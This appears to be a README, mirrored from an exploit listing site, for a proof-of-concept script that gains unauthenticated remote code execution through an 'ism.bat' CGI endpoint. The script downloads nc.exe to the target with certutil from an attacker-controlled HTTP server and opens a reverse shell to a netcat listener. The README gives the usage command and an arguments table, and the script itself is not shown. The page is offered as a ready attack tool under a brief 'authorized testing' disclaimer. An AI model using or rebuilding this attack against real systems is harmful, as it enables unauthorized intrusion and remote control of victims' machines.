Share
## https://sploitus.com/exploit?id=C85D6B10-6FA1-5BE2-89D8-AE3D912689D7
# ISM.bat RCE Exploit

PoC script for unauthenticated Remote Code Execution via `ism.bat` CGI endpoint.
Delivers `nc.exe` to the target using `certutil` and triggers a reverse shell.

## Requirements
```bash
pip install requests
```

## Usage
```bash
python3 exploit.py \
  --host  \
  --port  \
  --server-ip  \
  --server-port  \
  --nc-ip  \
  --nc-port 
```
Adicionalmente:
```bash
Cambiar el valor de ism.bat al directorio explotable.
```

## Arguments

| Argument        | Required | Default | Description                        |
|-----------------|----------|---------|------------------------------------|
| `--host`        | โœ…       | โ€”       | Target IP address                  |
| `--port`        | โŒ       | 8080    | Target port                        |
| `--server-ip`   | โœ…       | โ€”       | IP serving `nc.exe` via HTTP       |
| `--server-port` | โŒ       | 80      | Port of the HTTP server            |
| `--nc-ip`       | โœ…       | โ€”       | Netcat listener IP                 |
| `--nc-port`     | โœ…       | โ€”       | Netcat listener port               |

## Disclaimer

For authorized security testing and educational purposes only.